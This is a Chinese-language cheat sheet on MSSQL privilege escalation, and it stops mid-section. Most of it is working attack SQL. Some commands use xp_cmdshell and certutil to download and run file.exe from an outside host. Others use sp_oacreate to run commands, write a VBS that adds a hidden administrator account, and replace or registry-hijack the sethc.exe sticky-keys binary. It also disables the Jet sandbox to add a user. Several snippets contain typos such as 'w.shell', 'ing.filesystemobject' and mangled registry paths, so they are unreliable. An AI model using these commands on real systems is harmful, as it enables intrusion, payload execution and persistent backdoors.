MSSQL提权与站库分离
1.权限
2.默认数据库
master、model、msdb、Northwind、pubs、tempdb
0x00 xp_cmdshell
exec master.dbo.xp_cmdshell 'cd c:www & certutil -urlcache -split -f
http://192.168.130.142:80/download/file.exe';
exec master.dbo.xp_cmdshell 'cd c:www & file.exe';
如果被删除,可以试试恢复。
exec sp_addextendedproc 'xp_cmdshell','Xplog70.dll'
0x01 sp_oacreate
开启
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',1;recofigure;
关闭
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;
1.调用cmd 来执行命令
w.shell执行命令
declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c xxx'
使用OLE自动存储过程执行命令,不返回执行结果,需将结果输出到一个文本中,然后使用xp_readerrorlog读取文本
Shell.Application执行命令,想查看
declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'run',null,'c:\windows\system32\cmd.exe /c net user>d:\e.txt'
exec master.dbo.xp_readerrorlog 1,'d:\e.txt'
2.写入启动项
declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'ing.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:RECYCLER1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'set wsnetwork=CreateObject("W.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';
3粘贴键替换
declare @o int
exec sp_oacreate 'ing.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o int
exec sp_oacreate 'ing.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe'
,'c:\windows\system32\dll\cache\sethc.exe';
大家可以灵活运用,这里也可以这样玩,把他写成vbs或者其他的来下载文件 ,为什么不直接调用cmd来下载,在2008系统上我是不成功的,但是sp_oacreate可以启动这个文件,所以换个思路。
declare @sp_passwordxieo int, @f int, @t int, @ret int;
exec sp_oacreate 'ing.filesystemobject', @sp_passwordxieo out;
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'c:www1.bat', 1;
exec @ret = sp_oamethod @f, 'writeline', NULL,'@echo off';
exec @ret = sp_oamethod @f, 'writeline', NULL,'start cmd /k "cd c:www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe"';
declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\www\1.bat'
declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\www\file.exe'
当然这里只是一种思路,你完全可以用vbs来下载什么的
4.其他操作
0x04 其他操作
删除文件
declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token
复制文件
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'
移动文件
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\3.txt'
替换粘滞键
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe'
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo i=out
exec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe'
0x02 沙盒
关闭沙盒模式
1. exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;
2. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode''REG_DWORD',0;
2.1
4. Select * From
OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell( net user itpro gmasfm /add )');
0x03 xp_regwrite
修改注册表 来劫持粘贴键 当然在2008数据库是不成立的 因为默认权限很低。
exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsNTCurrentVersionImage File Execution
Optionssethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
0x04 xp_regread /xp_regwrite
开放3389端口。
0x05 pulic
0x06 反弹注射技术
依靠opendatasource函数支持实现。
1.opendatasource 函数语法